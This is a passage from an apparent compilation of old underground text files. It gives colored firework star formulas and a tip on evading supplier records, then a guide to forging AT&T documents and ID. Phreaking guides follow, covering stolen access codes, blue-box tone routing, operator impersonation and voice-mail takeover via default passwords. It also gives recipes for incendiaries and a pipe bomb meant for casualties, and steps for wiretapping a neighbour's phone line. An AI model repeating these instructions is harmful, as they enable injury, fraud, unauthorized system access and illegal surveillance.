the forms of zinc available, only the dust form is in any way suitable. As a dust, it has the fineness of flour. Should be either of the technical or high purity grade. Avoid breathing the dust, which can cause lung damage. Used in certain star mixtures, and with sulfur, as a rocket fuel.  73  The Chemistry of Pyrotechnics Most pyrotechnic mixtures follow a very simple set of chemical rules. We'll go over those now. Most mixtures contain an oxidizing agent, which usually produces oxygen used to burn the mixture, and a reducing agent, which burns to produce hot gasses. In addition, there can be coloring agents to impart a color to the fire, binders, which hold the mixture in a solid lump, and regulators that speed up or slow down the speed at which the mixture burns. These are not all the possibilities, but they cover most all cases. Oxidizing agents, such as nitrates, chlorates, and perchlorates provide the oxygen. They usually consist of a metal ion and the actual oxidizing radical. For example, Potassium Nitrate contains a metal ion (Potassium) and the oxidizing radical (the Nitrate). Instead of potassium, we could instead substitute other metals, like sodium, barium, or strontium, and the chemical would still supply oxygen to the burning mixture. But some are less desirable. Sodium Nitrate, for example, will absorb moisture out of the air, and this will make it harder to control the speed at which the mixture will burn. In the following examples, we'll use the letter "X" to show the presence of a generic metal ion. Note that Nitrates are stingy with the oxygen that they give up. They only give one third of what they have. Some Some Nitrate Nitrite Oxygen 2XNO ---> 2XN0 + O 3 2 2 Chlorates are very generous, on the other hand. They give up all the oxygen they have. Furthermore, they give it up more easily. It takes less heat, or less shock to get that oxygen loose. Mixtures using chlorates burn more spectacularly, because a smaller volume of the mix needs to be wasted on the oxidizer, and the ease with which the oxygen is supplied makes it burn faster. But the mixture is also MUCH more sensitive to shock. Some Some Chlorate Chloride Oxygen 2XClO ---> 2XCl + 3O 3 2 Perchlorates round out our usual set of oxidizing tools. Perchlorates contain even more oxygen than Chlorates, and also give it all up. However, they are not as sensitive as the Chlorates, so they make mixtures that are "safer". That is, they're less likely to explode if you drop or strike them. Some Some Perchlorate Chloride Oxygen XClO ---> XCl + 2O 4 2  73  Reducing agents, like sulfur and charcoal (carbon) simply burn the oxygen to produce sulfur dioxide and carbon dioxide. It's usually best to include a mixture of the two in a pyrotechnic mixture, as they burn at different speeds and temperatures, and the proper combination will help control the speed of combustion. Also, when extra fast burning speed is needed, like in rockets and firecrackers, metal powder is often added. The finer the powder, the faster the burning rate. The proportions change the speed, as well. Magnesium powder or dust is often used for speed. Aluminum dust works, but not as well. Zinc dust is used in some cases. Powdered metal, (not dust) particularly aluminum or iron, are often used to produce a mixtire that shoots out sparks as it burns. In rare cases, it is desirable to slow down the burning speed. In this case, corn meal is often used. It burns, so acts as a reducing agent, but it doesn't burn very well. Coloring agents are very interesting. It's long been known that various metals produce different colored flames when burned in a fire. The reasons are buried in the realm of quantum physics, but the results are what matters, and we can present them here. Note that if we use an oxidizing agent that contains a colorizing metal, it can do a double job. It can produce oxygen and color. Barium -Barium salts give a pleasant green color. Barium Nitrate is most often used. Strontium -Strontium salts give a strong red color. Strontium Nitrate is a very convenient material for red. Sodium -Sodium salts give an intense yellow color. So intense in fact that any sodium compounds in a mixture will usually wash out other colorizers. As has been said, Sodium Nitrate absorbs moisture from the air, and so is not really suitable to impart color. Instead, Sodium Oxalate is usually used. This does not absorb lots of water, but has the disadvantage of being very poisonous. Copper -Copper salts are used to give a blue color. Blue is the most difficult color to produce, and it's usually not too spectacular. Usually Copper Acetoarsenite (Paris Green) is used. This compound contains arsenic, and is very poisonous. Since it still doesn't produce a very memorable blue, it's often used with mercurous chloride, which enhances the color, but is also poisonous, and expensive, to boot. Potassium -Potassium salts will give a delicate purple color, if they'e very pure. The cheaper lab grades of potassium nitrate often contain traces of sodium, which completely obscure the purple color. In order to get the purple coloring, very pure grades must be used, and you must be very careful to mix it in very clean vessels, and scoop it from the supply jar with a very clean scoop. The color is certainly worth the effort, if you can get it. Some mixtures that burn in colors also contain binders, that hold the mixture together in a solid lump. These lumps are usually referred to as stars. The balls fired from a roman candle or the colorful showers sprayed from aerial bombs are examples of stars. Depending on the mixture, the binder is either a starch called dextrine or finely powdered orange shellac. A shellac-like material called red gum is also used on occasion. In some mixtures, the shellac powder also helps produce a nice color. Shellac mixtures are moistened with 73 alcohol to get them to stick together. Dextrine mixtures are moistened with water. If the colored mixture is to be used as a flare, it's just packed into a thin paper tube. If it's to be fired from a roman candle, it's usually extruded from a heavy tube by pushing it out with a dowel, and the pieces are cut off as the proper length pops out. Stars fired from an aerial bomb are usually made by rolling the moist mixture flat, and cutting it with a knife into small cubes. Stars that are extruded are often called "pumped stars" those that are rolled out are "cut stars". The following are formulas for mixtures that burn with various colors. Parts are by weight. Red Potassium Chlorate 9 Lampblack 1 Strontium Nitrate 9 bind with shellac dissolved in alcohol Blue Potassium Chlorate 9 This one is inferior Copper Acetoarsenite 2 Potassium Chlorate 12 Mercurous Chloride 1 Copper Sulfate 6 Sulfur 2 Lead Chloride 1 bind with dextrine Sulfur 4 in water bind with dextrin in water Green Barium Chlorate 8 Barium Nitrate 3 Lampblack 1 Potassium Chlorate 4 Shellac Powder 1 Shellac Powder 1 bind with alcohol Dextrine 1/4 Bind with alcohol Yellow Potassium Chlorate 8 Potassium Chlorate 8 Sodium Oxalate 3 Sodium Oxalate 4 Lampblack 2 Shellac Powder 2 Bind with shellac in Dextrine 1 alcohol or dextrine Bind with alcohol in water White Potassium Nitrate 6 Sulfur 1 73 Antimony Sulfide 2 bind with dextrine in water Orange Strontium Nitrate 36 Sodium Oxalate 8 Potassium Chlorate 5 Shellac Powder 5 Sulfur 3 Bind with alcohol Purple (ingredients must be very pure) Potassium Chlorate 36 This one has more of a lilac color Strontium Sulfate 10 Potassium Chlorate 38 Copper Sulfate 5 Strontium Carbonate 18 Lead Chloride 2 Copper Chloride 4 Charcoal 2 Lead Chloride 2 Sulfur 12 Sulfur 14 bind with dextrine in bind with dextrine in water water Brilliant White Potassium Perchlorate 12 Aluminum Dust 4 Dextrine 1 Bind with water Golden Twinkler Stars - Falls through the air and burns in an on and off manner. The effect is spectacular. A pumped or cut star. Potassium Nitrate 18 Sulfur 3 Lampblack 3 Aluminum Powder 3 Antimony Sulfide 3 Sodium Oxalate 4 Dextrine 2 Bind with water Zinc Spreader Stars - Shoot out pieces of burning zinc and charcoal. These stars are much heavier than usual, and require larger charges if they're to be fired from a tube. Zinc Dust 72 Potassium Chlorate 15 Potassium Dichromate 12 Granular Charcoal 12 73 Dextrine 2 bind with water Electric Stars - Stars that contain aluminum powder Potassium Nitrate 15 Potassium Chlorate 60 Aluminum, fine 2 Barium Nitrate 5 Aluminum, medium 1 Aluminum, fine 9 Black Powder 2 Aluminum, medium 4 Antimony Sulfide 3 Aluminum, coarse 3 Sulfur 4 Charcoal 2 bind with dextrine in Dextrin 5 water bind with red gum in water Potassium Perchlorate 6 Barium Nitrate 1 Potassium Perchlorate 4 Aluminum 20 Aluminum, medium 2 Dextrin 1 Dextrin 1 bind with shellac in bind with shellac in alcohol alcohol Simpler Zinc Spreaders Potassium Nitrate 14 Potassium Chlorate 5 Zinc Dust 40 Potassium Dichromate 4 Charcoal 7 Charcoal, medium 4 Sulfur 4 Zinc Dust 24 bind with dextrine in bind with dextrine in water water Willow Tree Stars - Use large amounts of lampblack -- too much to burn fully. Gives a willow tree effect. Potassium Chlorate 10 Potassium Nitrate 5 Sulfur 1 Lampblack 18 bind with dextrine in water In future files, we'll look at using these mixtures to produce roman candles, aerial bombs, and other effects. As always, don't forget that it's just plain stupid to go buying all these materials from one chemical supply house. When you buy it all as a group, they know what you plan to do with it, and they keep records. If anyone goes investigating the source of homemade fireworks and checks with your supplier, there will be a lead straight to you. Be sure to cover your tracks. AT&T FORGERY Here is a very simple way to either:  73 [1] Play an incredibly cruel and realistic joke on a phreaking friend. -OR- [2] Provide yourself with everything you ever wanted to be an AT&T person. All you need to do is get your hands on some AT&T paper and/or business cards. To do this you can either go down to your local business office and swipe a few or call up somewhere like WATTS INFORMATION and ask them to send you their information package. They will send you: 1. A nice letter (with the AT&T logo letterhead) saying "Here is the info." 2. A business card (again with AT&T) saying who the sales representative is. 3. A very nice color booklet telling you all about WATTS lines. 4. Various billing information. (Discard as it is very worthless) Now take the piece of AT&T paper and the AT&T business card down to your local print/copy shop. Tell them to run you off several copies of each, but to leave out whatever else is printed on the business card/letter. If they refuse or ask why, take your precious business elsewhere. (This should only cost you around $2.00 total) Now take the copies home and either with your typewriter, MAC, or Fontrix, add whatever name, address, telephone number, etc. you like. (I would recommend just changing the name on the card and using whatever information was on there earlier) And there you have official AT&T letters and business cards. As mentioned earlier, you can use them in several ways. Mail a nice letter to someone you hate (on AT&T paper..hehehe) saying that AT&T is onto them or something like that. (Be sure to use correct English and spelling) (Also do not hand write the letter! Use a typewriter! - Not Fontrix as AT&T doesn't use OLD ENGLISH or ASCII BOLD when they type letters. Any IBM typewriter will do perfectly) Another possible use (of many, I guess) is (if you are old enough to look the part) to use the business card as some sort of fake id. The last example of uses for the fake AT&T letters & b.cards is mentioned in my textfile, BASIC RADIO CALLING. Briefly, send the station a letter that reads: WCAT - FM202: (Like my examples? Haha!) (As you probably know, radio stations give away things by accepting the 'x' call. (ie: The tenth caller through wins a pair of Van Halen tickets) Sometimes they may ask a trivia question, but that's your problem. Anyway, the letter continues:) (You basically say that they have become so popular that they are getting too many calls at once from listeners trying to win tickets. By asking them to call all at the same time is overloading our systems. We do, of course, have means of handling these sort of matters, but it would require you sending us a schedule of when you will be asking your listeners to call in. That way we would be able to set our systems to handle the amount of callers you get at peak times..(etc..etc..more BS..But you get the idea, right?) The Hacker's Handbook [ Definitions ] 73  Phreak ["free"k] Verb--1. The act of "Phreaking" 2. The act of making telephone calls without paying money [Slang] Phreaker ["free"-k-er] Noun--1. One who engages in the act of "Phreaking" 2. One who makes telephone calls without paying money [Slang] <%=-------------------------------------------------------------------------=%> [ Introduction ] Phreaking is a method used by most intelligent people {most often those who use a computer and a Modulator-Demodulator (MoDem)}. If you happen to resemble the major mass of people who do not have the income to afford large phone bills then phreaking is for you. If you live in an area with an Electronic Switching System [ESS] then phreaking is something which should be done in moderate amounts. <%=-------------------------------------------------------------------------=%> [ Switching Systems ] Three types of switching systems are present in the United States today: [1] Step by Step [2] Crossbar [3] ESS {Electronic Switching System} <] Step by Step [> First switching system used in America, adopted in 1918 and until 1978 Bell had over 53% of all exchanges using Step by Step [SxS]. A long, and con- fusing train of switches is used for SxS switching. [> Disadvantages <] [A] The switch train may become jammed : Blocking call. [B] No DTMF [Dual-Tone Multi-Frequency]["Touch-tone"]. [C] Much maintenance and much electricity. [D] Everything is hard wired +> Identification <+ [A] No pulsing digits after dialing or DTMF. [B] Phone Company sounds like many typewriters. [C] No: Speed calling, Call forwarding, and other services. [D] Pay-phone wants money first before dial-tone. <] Crossbar [> Crossbar has been Bell's primary switcher after 1960. Three types of Crossbar switching exist: Number 1 Crossbar [1XB], Number 4 Crossbar [4XB], and Number 5 Crossbar [5XB]. A switching matrix is used for all the phones in an area. When someone calls, the route is determined and is met up with the other phone. The matrix is set-up in horizontal and vertical paths. There are no definite 73 distinguishing features of Crossbar switching. <] ESS [> You probably were hoping I wouldn't talk about this nightmare, if you did you will know why everyone doesn't want to be reminded about Bell's holocaust on America. With ESS Bell knows: every digit dialed {including mistakes!}, who you call, when you called, how long you were connected, and in some cases, what you talked about! Yes, this is the closest anyone has come to true Totalitarianism. ESS is programed to print out the numbers of people who make excessive calls to WATS numbers [Wide Area Telephone Service][1-800 numbers] or directory assistance. This deadly trap is called "800 Exceptional Calling Report." ESS can be programed to print logs of who called certain numbers. Electronic Switching System makes the job of the FBI, Bell Security {The Gestapo in phreakin' tongue}, NSA, and other organizations which like to invade our privacy, extremely easy! Tracing is done in microseconds, and the results are printed out on the monitor of a Gestapo officer. ESS can also pick up foreign tones on the line, like 2600 Hz. {used in blue boxes, discussed later}. Bell claims that the entire country will be plagued by ESS by the 1990's! +> Identification <+ [A] Dialing 911 for emergencies. [B] Dial-tone first for pay-phones. [C] Calling services, like: Call forwarding, Speed dialing, Call waiting. [D] ANI [Automatic Number Identification] for long-distance calls. [[[Note]]] of the above identifications of the three switching systems, do not solely rely on these descriptions, the best way to find out is to [no!] call your local telephone company. <%=-------------------------------------------------------------------------=%> [ Long-Distance Services ] To attempt to help the community {and for private business} companies developed ways to lessen the costs of long-distance calling charges. The companies own their own switching systems and use extenders for callers to call. The way extenders operate: 1] Customer calls service, 2] He/she hears a low tone which sounds like a dial-tone, 3] She/he either dials the access code then the phone number, or dials the phone number then the access code, 4] Is connected to whatever he/she calls. Aside from Ma Bells collection, the customer receives a bill for calls made with his/her long-distance company {a supposedly cheaper bill than Ma Bell's}. Thought: Hey, I could randomly pick access codes and use them to call whatever area the company services! Right, that's what basic phreaking is! A wise idea, though, is to have many access codes and many service numbers to rotate throughout your average life as a phreaker. To aid in your quest to beat the system I have provided many 1-800 numbers which anyone can call, aside from local numbers, such as Sprint, or MCI. The reason for providing you with WATS numbers is because all of us aren't in a big city where Sprint or MCI even exist, this way everyone can phreak! A way to find more access codes is by using your old modem. Yes, your modem can imitate DTMF tones!  73  {>Procedure: 1) dial 1-800 + service number 2) dial access code->area code->phone number, or 3) dial area code->phone number->access code [ Colored Boxes ] A more shrewd, technological, safer {without ESS} way to phreak is with a piece of hardware known as a ________ Box. Boxes are many different colors {I don't know ALL the colors because it seems like every time I turn around there's some new color out!}. Colors I have heard of: Blue, Black, Red, White, Silver, Clear, and MANY, MANY more... Plans for making these boxes can be obtained by calling different boards [BBS's], AE lines, or whatever. But!, if you have an Apple Cat modem then do I have good news for ->you<-!! The Apple Cat modem can emulate the frequencies {usually 2600 Hz.} made by ________ Boxes with the help of a handy little program called "Cat's Meow!" <%=-------------------------------------------------------------------------=%> Hacking Voice Mail Systems Voice Mail is a relatively new concept and not much has been said about it. It is a very useful tool for the business person and the phreak. The way it works is that somebody wishing to get in touch with you calls a number, usually a 1-800, and punches in on his touch-pad your mailbox number and then he is able to leave a message for you. Business experts report that this almost totally eliminates telephone tag. When a person wishes to pick up his message all he needs to do is call the number enter a certain code and he can hear his messages, transfer them, and do other misc. mailbox utilities. Most VMSs are similar in the way they work. There are a few different ways the VMSs store the voice. One way is that the voice is recorded digitally and compressed and when heard it is reproduced back into the voice that recorded it. Another method that is slower and uses more space, but costs less, stores the voice on magnetic tape, the same type that is used to store data on a computer, and then runs the tape at a slow speed. Using this method the voice does not need to be reproduced in any way and will sound normal as long as the tape is running at a constant speed. On some of the newer VMSs the voice is digitally recorded and is transformed from the magnetic tape at about 2400 bits per second. There are many different types and versions of voice mail systems. Some of the best and easiest to get on will be discussed. Centagram --------- These are direct dial (you don't have to enter a box number). To get on one of these, first have a number to any box on the system. All of the other boxes will be on the same prefix; just start scanning them until you find one that has a message saying that person you are calling is not available. This usually means that the box has not been assigned to anybody yet. Before the nice lady's voice tells you to leave the message, hit #. You will then be prompted for your password. The password will usually be the same as the last four digits of the box's number or a simple number like 1000, 2000, etc. Once you get on, they are very user friendly and will prompt you with a menu of 73 options. If you can't find any empty boxes or want to do more, you can hack but the system administrators box, which will usually be 9999 on the same prefix as the other boxes, will allow you to hear anybody's messages and create and delete boxes. Sperry Link ----------- These systems are very nice. They will usually be found on an 800 number. These are one of the hardest to get a box on because you must hack out a user ID (different from the person's box number) and a password. When it answers, if it says, "This is a Sperry Link voice station. Please enter your user ID," you will have to start trying to find a valid user ID. On most Sperrys it will be a five digit number. If it answers and says, "This is an X answering service," you first have to hit *# to get the user number prompt. Once you get a valid user number will have to guess the password on most systems, it will be 4 digits. Once you get in, these are also very user friendly and have many different options available. RSVP ---- This is probably one of the worst VMSs but it is by far the easiest to get yourself a box. When it answers you can hit * for a directory of the boxes on it (it will only hold 23). If you hit # you will be given a menu of options and when you choose an option you will then be prompted for your ID number. The ID number on an RSVP system will just about always be the same as the mailbox number, which are always only 2 digits. A.S.P.E.N. ---------- The Aspen voice message systems made by Octel Telecommunications is in my opinion the BEST VMS made. To get a box on an Aspen, you need to find an empty box. To find an empty box, scan the box numbers and if one says, "You entered XXXX. Please leave a message at the tone," then this is an empty box. You next just press # and when prompted for your box number enter the number of the empty box and friendly voice of the nice lady will guide you through all of the steps of setting up your box. She first tells you what you can do with the box and then will prompt you with, "Please enter the temporary password assigned to you by your system manager." This password will usually be 4 digits long and the same as the box number like 1000, etc. Once you get on their are many things you can do. You can make a distribution list where if you want to leave a certain message to more than one person, you can enter the list number and all of the boxes on the list will get the message. You can also have the system call you and notify you that you have new messages. These systems also have what they call "Information center mailboxes" that are listen only and can also have a password on them so the person calling has to enter the password before he hears the greeting message. Aspen VMSs have a system managers mailbox that will just about give you total control of the whole system and let you listen to people's mail, create and delete boxes, and many other things. IMPROVISED INCENDIARIES 1) Chlorate-Sugar mix 73  This mixture can be either an incendiary or an explosive. Sugar is the common granulated household type. Either potassium chlorate (KClO3) or sodium chlorate (NaClO3) can be used; but potassium is potassium is preferred. Proportions can be by equal parts or by volume, or 3 parts chlorate to 2 parts sugar preferred. Mix in or on a non-sparking surface. Unconfined, the mixture is an incendiary. Confined in a tightly capped length of pipe, it will explode when a spark is introduced. Such a pipe will produce lovely casualties, but is not very good for breaching of cutting up. Concentrated sulfuric acid will ignite this very fast burning incendiary mixture. Placing the acid in a gelatin capsule, balloon, or other suitable container will provide a delay, (length of which depends on how long it takes for the acid to eat through the container). 2) Potassium P      !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrsuvwxyz{|}~ermanganate And Sugar Another fast burning, first fire mix is obtained by mixing potassium permanganate, 9 parts, to one part sugar. It is some what hotter than the chlorate sugar mix, and can be ignited by the addition of a few drops of glycerine. 3) Improvised Napalm In talking about this, I have found that there are many ways to this wonderful substance. My favorite is by mixing gasoline and styrofoam. Usually in a metal can. Keep adding the styrofoam until the mix is very stinky, an then add a little bit of kerosine. Another method is by taking a double boiler, filling the bottom portion with approx 3/4 full of water. Put either gasoline or kerosine into the top. Add pure SOAP chips to the mix. Heat the fuel until it boils and then simmers. Stir constantly until the desired consistency is reached: remember that it will thicken further on cooling. Last we come the 'Soldier' technique, anyone who saw this movie will recognize this one. Carefully heat the end of a 100 watt light bulb. again-carfully remove the metal end and internal parts. Fill the glass bulb with half gasoline. and then 1/4 more with dish washing liquid. Finally take rubber cement and glue the two parts back together. Be sure that you put enough mixture into the build so that the metal wire is well submerged before use and during. 4) Molded Bricks That Burn Proportions are 3 parts aluminum powder, 4 parts water and 5 parts plaster of paris. Mix the aluminum and plaster thoroughly together, then add the water and stir vigorously. Pour the resulting mix into a mold, let harden, and then dry for 2 to 3 weeks. These blocks are hard to ignite, and take a long time to make, but when ignited on mild steal, they have a tendency to melt it. 5) The Fire Bottle Fill a good Jack Daniel's bottle about one-fifth to one-fourth full with sulfuric acid. Fill the remainder with gasoline, kerosine, or a good combination of the two and mix thoroughly. Add water to Potassium Chlorate and sugar mix, and soak rags in the mix. Wrap the rags around the bottle, tie in place, and allow to dry. When thrown at a T-62 or other target, the bottle will break, the acid will ignite the chlorate-sugar mix on the rags, which will ignite the fuel. 73  6) Molotov Cocktails These do not 'explode' per say, they just spread around the fuel and, if your lucky the oil/gas mix combusts enough to give you a little "boom". A two to one ratio of gas to oil works nicely. Napalm can also be used, or jelly gas is fine. 7) Thermite Use any size can with sticks tied or taped to sides and cut a small hole in the bottom. Cover bottom with paper. Place round stick wrapped in paper in middle of can. Fill bottom of can 1/4 inch with magnesium. Over this place mixture of 3 parts ferric oxide and 2 parts aluminum powder. Remove stick (leaving paper tunnel) and fill hole with mixture 3 parts potassium chlorate and 1 part sugar. Top the hole with a paper bag containing chlorate-sugar mix with fuse protruding Tamp top with dirt or clay. THE JOY OF "BOXING" BY THE DRAGYN I AM WRITTING THIS ARTICLE TO INFORM THOSE OF YOU THAT HAVE A BOX AND ARE GETTING BORED WITH NOTHING TO DO OR IF YOU JUST AREN'T QUITE SURE WHAT YOU ARE DOING WHEN YOU PLAY AROUND WITH MF TONES. FIRST OF ALL, WHEN YOU BLAST OUT THE 2600HZ TONE, YOU ARE DROP PING A TRUNK AND ESSENTIALLY, YOU BECOME YOUR OWN OPERATOR. WHEN YOU PLACE A LONG DISTANCE PHONE CALL, A COMPUTER USUALLY DOES THE MF TONES FOR YOU AND YOU DON'T HEAR THEM. IN THIS ARTICLE, I WILL DEAL WITH INTERNATIONAL CALLING, CONFERENCING, EMERGENCY-BREAK THROUGHS AND JUST HAVING FUN WITH THE BOX. BUT NOWDAYS, BOXING IS MUCH MORE RISKIER THAN IT WAS BACK 10-15 YEARS AGO, SO IF YOU AREN'T CAUTIOUS OR YOU LIVE ON A MODERN ESS, THAN YOU MIGHT JUST GET CAUGHT (BUT IF YOU'RE NOT 18 YET THEN BIG DEAL! GO RAG THE HELL OUT OF MA BELL!) HAVE YOU EVER WANTED TO CALL OVERSEAS AND TALK TO SOMEONE IN ANOTHER COUNTRY? OR ARE YOU JUST BORED OF METROFONE OR MCI? THEN TRY THIS: WHEN YOU PLACE AN INTERNATIONAL CALL, IT IS ROUTED THROUGH THE CLOSEST OR CLOSEST UNBUSY INTERNATIONAL LINK. YOU CAN FIND THESE LINKS BY GOING KP-213-182-ST. THIS IS THE LOS ANGLES LINK. MOST MAJOR CITIES HAVE THEM BY THE COAST LIKE NEW YORK KP-212-182-ST AND EVEN DENVER KP-303-182-ST. WHEN YOU CALL ONE OF THESE LINKS, YOU WILL GET A TONE, SOMETIMES NOT, AND THEN YOU HAVE ABOUT 10 SECONDS TO ENTER THE NUMBER YOU ARE DIALING IN MF TONES. IF YOU MAKE A MISTAKE, IT WILL TELL YOU. THE NORMAL FORMAT FOR MAKING A CALL WOULD BE: KP-212-182-ST (WAIT FOR TONE) KP-( COUNTRY CODE)-(PHONE NUMBER IN COUNTRY) -ST THEN WAIT FOR THE CALL TO GO THROUGH. THERE TWO WAYS TO DO CONFERENCE CALLS. ONE IS TO MF UP KP-213-080-1050- ST. THIS GIVES YOU ALIANCE TELE-CONFERENCING IN LOS ANGLES. THE WAY THIS ONE WORKS IS YOU ENTER KP-2130801050-ST WAIT TILL YOU HEAR IT DROP TWICE THEN YOU ENTER ANOTHER NUMBER THAT THE CALL IS GOING TO BE BILLED TO (USUALLY SOME- ONE THAT YOU DON'T LIKE). THIS ONE IS TOTALLY COMPUTER CONTROLLED AND YOU JUST ENTER THE INFO NEEDED BY A NORMAL TOUCH TONE PAD. THE OTHER WAY FOR CONFERENCING IS 73 TO MF UP YOUR LOCAL OR NOT SO LOCAL CONFERENCE OPERATOR. TO DO THIS JUST DROP A TRUNK THEN GO KP-(AREA CODE)-11511-ST AND THE LADY WILL ANSWER "CONFERENCE OPERATOR, CAN I HELP YOU?" NOW IF YOU WANTED TO HOOK JUST 1-10 PEOPLE TOGETHER YOU GIVE HER THE PH#S AND SHE WILL DIAL THEM UP AND PUT EVERYONE ON TOGETHER, MEANWHILE, SHE THINKS YOU ARE THE OPERATOR SETTING IT UP FOR SOMEONE ELSE. ONE NOTE, WHENEVER YOU ARE DIALING IN MF TONES AND GET AN OPERATOR, THEY HAVE NO IDEA THAT YOU ARE BOXING, THEY JUST THINK YOU ARE AN OPERATOR FROM SOMEWHERE OUT OF TOWN. SO DON'T BE SCARED, GIVE THOSE OPERATORS HELL! IN FACT, IF YOU CAN FIND A GOOD OPERATOR, THEY WILL EVEN TELL YOU HOW TO DO THINGS. NOW DON'T YOU ALL HATE A BUSY SIGNAL? EVER TRY TO GET TO SOMEONE AND THE LINE WAS BUSY? WELL, DON'T FRET ANYMORE! LET'S SAY THAT THE PHONE NUMBER 612-874-8700 WAS BUSY AND YOU WANTED TO GET THROUGH. FIRST YOU WOULD DROP YOUR TRUNK THEN GO KP-612-121-ST. THIS WILL GIVE YOU A LOCAL OPERATOR IN THE 612 AREA CODE. WHEN SHE ANSWERS (SHE THINKS YOU ARE AN OPERATOR FROM SOME-WHERE ELSE CALLING) YOU SAY "EMERGENCY INTERRUPTION ON AREA CODE 612-874-8700 AND THE PARTIES NAME IS PETER (OR SOME DUMP NAME)." SINCE TRUNK VERIFICATION CANNOT BE DONE BY OUTSIDE TOLL SWITCHING SYSTEMS, YOU CANNOT DO THESE BY BOXING AND YOU HAVE TO LET THE OPERATOR DO THEM FOR YOU. AGAIN, SHE HAS NO WAY OF KNOWING THAT YOU AREN'T AN OPERATOR WHEN YOU CALL HER UNLESS YOU ARE 12 YEARS OLD AND SOUND LIKE A SNIVELING LITTLE WIMP. AFTER THE OPERATOR HAS CLEARED THE LINE, YOU CAN DIAL IT AND I T WON'T BE BUSY. IF IT IS OUT OF ORDER SHE MAY SAY IT IS ODD OR OFF THE HOOK. NOW LET'S SAY YOU JUST WANT TO MAKE AN ORDINARILY PHONE CALL OR CALL AN 800 PH#. AFTER YOU DROP YOUR TRUNK, JUST DO THIS KP-(AREA CODE)-(PH#)-ST, AND NOTICE THAT NO '1' IS NEEDED. NOW, WHAT IF YOU HAVE A FRIEND WITH A PHONE IN HIS CAR? WELL, YOU JUST MF UP THE MOBILE OPERATOR BY GOING KP-(AREA CODE)-11521-ST. AGAIN, REMEMBER THAT WHENEVER YOU TALK TO ONE OF THE OPERATORS, THEY HAVE NO WAY OF KNOWING WHETHER YOU ARE A REAL OPERATOR OR NOT SO GIVE THEM HELL AND DON'T BE SCARED! I GUESS THAT THIS IS ALL FOR NOW, BUT IF YOU WOULD LIKE MORE INFORMATION, LEAVE E-MAIL BUT NO RUGGIES PLEASE. * PRIVATE AUDIENCE * (A BASIC LESSON IN THE ART OF LISTENING IN) Federal law: Section 605 of title 47 of the U.S code, forbids interception of communication, or divulagance of intercepted communication except by persons outlined in section 119 of title 18 (a portion of the Omnibus crime control and safe streets act of 1968). This act states that "It shall not be unlawful under this act for an operator of a switchboard, or an officer, employee, or agent of any communication common carrier who's switching system is used in the 73 transmission of a wire communication to intercept or disclose intercepted communication." PART II: TAPPING Everyone has at some time wanted to hear what a friend, the principal, the prom queen, or a neighbor has to say on the phone. There are several easy ways to tap into a phone line. None of the methods that I present will involve actually entering the house. You can do everything from the backyard. I will discuss four methods of tapping a line. They go in order of increasing difficulty. 1. The "beige box": a beige box (or bud box) is actually better known as a "lineman" phone. They are terribly simple to construct, and are basically the easiest method to use. They consist of nothing more than a phone with the modular plug that goes into the wall cut off, and two alligator clips attached to the red and green wires. The way to use this box, is to venture into the yard of the person you want to tap, and put it onto his line. This is best done at the bell phone box that is usually next to the gas meter. It should only have one screw holding it shut, and is very easily opened. Once you are in, you should see 4 screws with wires attached to them. If the house has one line, then clip the red lead to the first screw, and the green to the second. You are then on the "tappee's" phone. You will hear any conversation going on. I strongly recommend that you remove the speaker from the phone that you're using so the "tappee" can't hear every sound you make. If the house has two lines, then the second line is on screws three and four. If you connect everything right, but you don't get on the line, then you probably have the wires backward. Switch the red to the second screw and the green to the first. If no conversation is going on, you may realize that you can't tap the phone very well because you don't want to sit there all night, and if you are on the phone, then the poor tappee can't dial out, and that could be bad...so....... method two. 2. The recorder: This method is probably the most widespread, and you still don't have to be a genius to do it. There are LOTS of ways to tape conversations. The two easiest are either to put a "telephone induction pickup" (Radio Shack $1.99) on the beige box you were using, then plugging it into the microphone jack of a small tape recorder, and leaving it on record. Or plugging the recorder right into the line. This can be done by taking a walkman plug, and cutting off the earphones, then pick one of the two earphone wires, and strip it. There should be another wire inside the one you just stripped. Strip that one too, and attach alligators to them. Then follow the beige box instructions to tape the conversation. In order to save tape, you may want to use a voice activated recorder (Radio Shack $59), or if your recorder has a "remote" jack, you can get a "telephone recorder control" at Radio shack shack for $19 that turns the recorder on when the phone is on, and off when the phone is off. This little box plugs right into the wall (modularly of course), so it is best NOT to remove the modular plug for it. Work around it if you can. If not, then just do you best to get a good connection. When recording, it is good to keep your recorder hidden from sight (in the Bell box if possible), but in a place easy enough to change tapes from. 3. The wireless microphone: this is the BUG. It transmits a signal from the phone to the radio (FM band). You may remember Mr. Microphone (from Kaytel fame); these wireless microphones are available from Radio Shack for $19. They are easy to build and easy to hook up. There are so many different models, that 73 is is almost impossible to tell you exactly what to do. The most common thing to do is to cut off the microphone element, and attach these two wires to screws one and two. The line MIGHT, depending on the brand, be "permanently off hook". This is bad, but by phucking around with it for a while, you should get it working. There are two drawbacks to using this method. One, is that the poor asshole who is getting his phone tapped might hear himself on "FM 88, the principal connection". The second problem is the range. The store bought transmitters have a VERY short range. I suggest that you build the customized version I will present in part four (it's cheaper too). Now on to the best of all the methods.... 4. The "easy-talks": This method combines all the best aspects of all the the other methods. It only has one drawback... You need a set of "Easy-talk" walkie talkies. They are voice activated, and cost about $59. You can find 'em at toy stores, and "hi-tech" catalogs. I think t(at any voice activated walkie talkies will work, but I have only tried the easy-talks. First, you have to decide on one for the "transmitter" and one for the "receiver". It is best to use the one with the strongest transmission to transmit, even though it may receive better also. De-solder the speaker of the "transmitter", and the microphone of the "receiver". Now, go to the box. put the walkie talkie on "VOX" and hook the microphone leads (as in method three) to the first and second screws in the box. Now go home, and listen on your walkie talkie. If nothing happens, then the phone signal wasn't strong enough to "activate" the transmission. If this happens, there are two things you can do. One, add some ground lines to the microphone plugs. This is the most inconspicuous, but if it doesn't work then you need an amplifier, like a walkman with two earphone plugs. Put the first plug on the line, and then into one of the jacks. Then turn the volume all the way up (w/out pressing play). Next connect the second earphone plug to the mice wires, and into the second earphone outlet on the walkman. Now put the whole mess in the box, and lock it up. This should do the trick. It gives you a private radio station to listen to them on: you can turn it off when something boring comes on, and you can tape off the walkie talkie speaker that you have! PART IV: WIRELESS TRANSMITTER PLANZ This is a tiny transmitter that consists on a one colpitts oscillator that derives it's power from the phone line. Since the resistance it puts on the line is less than 100 ohms, it has no effect on the telephone performance, and can not be detected by the phone company, or the tappee. Since it is a low-powered device using no antenna for radiation, it is legal to the FCC. (That is it complies with part 15 of the FCC rules and regulations). It, however is still illegal to do, it's just that what you're using to do it is 